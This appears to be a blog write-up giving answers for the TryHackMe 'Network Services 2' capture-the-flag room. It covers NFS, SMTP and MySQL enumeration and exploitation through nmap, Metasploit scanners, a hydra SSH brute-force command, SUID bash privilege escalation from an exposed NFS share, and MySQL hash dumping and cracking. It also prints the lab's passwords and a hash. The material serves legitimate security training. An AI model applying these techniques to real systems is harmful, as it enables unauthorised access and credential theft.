Network Services 2 WriteUp – TryHackMe

In this article, I tried to prepare a write-up for the “Network Services 2” room on tryhackme.


[Task 1] Get Connected

This room is a sequel to the first network services room. Similarly, it will explore a few more common Network Service vulnerabilities and misconfigurations that you’re likely to find in CTFs, and some penetration test scenarios.

#1 Ready? Let’s get going!

ANSWER: No answer needed


[Task 2] Understanding NFS

NFS stands for “Network File System” and allows a system to share directories and files with others over a network. By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by mounting all, or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.

#1 What does NFS stand for?

NFS stands for “Network File System” and allows a system to share directories and files with others over a network.

ANSWER: Network File System

#2 What process allows an NFS client to interact with a remote directory as though it was a physical device?

 By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by “mounting” all, or a portion of a file system on a server.

ANSWER: Mounting

#3 What does NFS use to represent files and directories on the server?

If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

  •  The file handle
  •  The name of the file to be accessed
  •  The user’s, user ID
  •  The user’s group ID

ANSWER: file Handle

#4 What protocol does NFS use to communicate between the server and client?

 The mount service will then act to connect to the relevant mount daemon using RPC.

ANSWER: RPC

#5 What two pieces of user data does the NFS server take as parameters for controlling user permissions?

If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

  •  The file handle
  •  The name of the file to be accessed
  •  The user’s, user ID
  •  The user’s group ID

ANSWER: user id / group id

#6 Can a Windows NFS server share files with a Linux client? (Y/N)

ANSWER: Y

#7 Can a Linux NFS server share files with a MacOS client? (Y/N)

ANSWER: Y

#8 What is the latest version of NFS?

You can find the answer on this website

ANSWER: 4.2


[Task 3] Enumerating NFS

You can use this Nmap query:

nmap -p- -A -sC -Pn [IP Adress]
Nmap Result
Nmap Result

#1 Conduct a thorough port scan scan of your choosing, how many ports are open?

Port 22, 111, 2049, 37069, 39969, 41047, 48707 are open.

ANSWER: 7

#2 Which port contains the service we’re looking to enumerate?

You can see the answer in the 2nd picture above.

ASNWER: 2049

#3 Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

ANSWER: /home

#4 Change directory to where you mounted the share- what is the name of the folder inside?

Time to mount the share to our local machine!

First, use “mkdir /tmp/mount” to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.

Then, use the mount command we broke down earlier to mount the NFS share to your local machine. 

ANSWER: cappucino

#5 Have a look inside this directory, look at the files. Looks like  we’re inside a user’s home directory…

ANSWER: No answer needed

#6 Which of these folders could contain keys that would give us remote access to the server?

ANSWER: .ssh

#7 Which of these keys is most useful to us?

ANSWER: id_rsa

#8 Can we log into the machine using ssh -i <key-file> <username>@<ip> ? (Y/N)

ANSWER: Y


[Task 4] Exploiting NFS

#1 First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.

ANSWER: No answer needed

#2 The copied bash shell must be owned by a root user, you can set this using “sudo chown root bash”

ANSWER: No answer needed

#3 What letter do we use to set the SUID bit set using chmod?

ANSWER: s

#4 What does the permission set look like? Make sure that it ends with -sr-x.

ANSWER: -rwsr-sr-x

#5 The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.

ANSWER: No answer needed

#6 Great! If all’s gone well you should have a shell as root! What’s the root flag?

ANSWER: I’m sure you can find it in your own efforts 🙂


[Task 5] Understanding SMTP

#1 What does SMTP stand for?

SMTP stands for “Simple Mail Transfer Protocol“.

ANSWER: Simple Mail Transfer Protocol

#2 What does SMTP handle the sending of?

ANSWER: emails

#3 What is the first step in the SMTP process?

The mail user agent, which is either your email client or an external program. connects to the SMTP server of your domain. This initiates the SMTP handshake.

ANSWER: SMTP handshake

#4 What is the default SMTP port?

This connection works over the SMTP port- which is usually 25

ANSWER: 25

#5 Where does the SMTP server send the email if the recipient’s server is not available?

 If the recipient’s server can’t be accessed, or is not available– the Email gets put into an SMTP queue.

ANSWER: smtp queue

#6 On what server does the Email ultimately end up on?

ANSWER: POP/IMAP

#7 Can a Linux machine run an SMTP server? (Y/N)

SMTP Server software is readily available on Windows server platforms, with many other variants of SMTP being available to run on Linux.

ANSWER: Y

#8 Can a Windows machine run an SMTP server? (Y/N)

SMTP Server software is readily available on Windows server platforms, with many other variants of SMTP being available to run on Linux.

ANSWER: Y


[Task 6] Enumerating SMTP

Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!

#1 First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?

ANSWER: 25

#2 Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?

ANSWER: msfconsole

#3 Let’s search for the module “smtp_version”, what’s it’s full module name?

ANSWER: auxiliary/scanner/smtp/smtp_version

#4 Great, now- select the module and list the options. How do we do this?

ANSWER: options

#5 Have a look through the options, does everything seem correct? What is the option we need to set?

ANSWER: RHOSTS

#6 Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?

ANSWER: polosmtp.home

#7 What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

You can find the answer on this website.

ANSWER: Postfix

#8 Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module “smtp_enum“, what’s it’s full module name?

ANSWER: auxiliary/scanner/smtp/smtp_enum

#9 What option do we need to set to the wordlist’s path?

ANSWER: USER_FILE

#10 Once we’ve set this option, what is the other essential paramater we need to set?

ANSWER: RHOSTS

#11 Now, set the THREADS parameter to 16 and run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

ANSWER: No answer needed

#12 Okay! Now that’s finished, what username is returned?

ANSWER: administrator


[Task 7]  Exploiting SMTP

#1 What is the password of the user we found during our enumeration stage?

You can use this command:

hydra -t 16 -l [USERNAME] -P [rockyou.txt location] -vV [Machine IP Addres] ssh

ANSWER: alejandro

#2 Great! Now, let’s SSH into the server as the user, what is contents of smtp.txt

You can use this command:

ssh administrator@[Machine IP Address]
Password: alejandro

ANSWER: I’m sure you can find it in your own efforts 🙂


[Task 8] Understanding MySQL

#1 What type of software is MySQL?

MySQL is a relational database management system (RDBMS) based on Structured Query Language (SQL).

ANSWER: relational database management system

#2 What language is MySQL based on?

They use a language, specifically the Structured Query Language (SQL).

ANSWER: SQL

#3 What communication model does MySQL use?

As we knoww, it uses a client-server model.

ANSWER: client-server

#4 What is a common application of MySQL?

ANSWER: back end database

#5 What major social network uses MySQL as their back-end database? This will require further research.

ANSWER: Facebook


[Task 9] Enumerating MySQL

Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!

#1 What port is MySQL using?

ANSWER: 3306

#2 We can do this using the command “mysql -h [IP] -u [username] -p

ANSWER: No answer needed

#3 Okay, we know that our login credentials work. Lets quit out of this session with “exit” and launch up Metasploit.

ANSWER: No answer needed

#4 Search for, select and list the options it needs. What three options do we need to set? (in descending order).

ANSWER: PASSWORD/RHOSTS/USERNAME

#5 Run the exploit. By default it will test with the “select module()” command, what result does this give you?

ANSWER: 5.7.29-0ubuntu0.18.04.1

#6 Change the “sql” option to “show databases”. how many databases are returned?

ANSWER: 4


[Task 10] Exploiting MySQL

#1 First, let’s search for and select the “mysql_schemadump” module. What’s the module’s full name?

ANSWER: auxiliary/scanner/mysql/mysql_schemadump

#2 What’s the name of the last table that gets dumped?

First, you must start “mysql” services:

systemctl start mysql

Then we should use msfconsole:

We have to set the parameters:

Then run this payload:

ANSWER: x$waits_global_by_latency

#3 Search for and select the “mysql_hashdump” module. What’s the module’s full name?

ANSWER: auxiliary/scanner/mysql/mysql_hashdump

#4 Again, I’ll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?

ANSWER: carl

#5 What is the user/hash combination string?

ANSWER: carl:*EA031893AA21444B170FC2162A56978B8CEECE18

#6 Now, we need to crack the password! Let’s try John the Ripper against it using: “john hash.txt” what is the password of the user we found?

ANSWER: doggie

#7 What’s the contents of MySQL.txt

ANSWER: I’m sure you can find it in your own efforts 🙂


[Task 11] Further Learning

#1 Congratulations! You did it!

ANSWER: No answer needed


So far, I have tried to explain the solutions of the questions as detailed as I can. I hope it helped you. See you in my next write-up.

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Google fotoğrafı

Google hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Connecting to %s

WordPress.com'da Blog Oluşturun.

Yukarı ↑

%d blogcu bunu beğendi: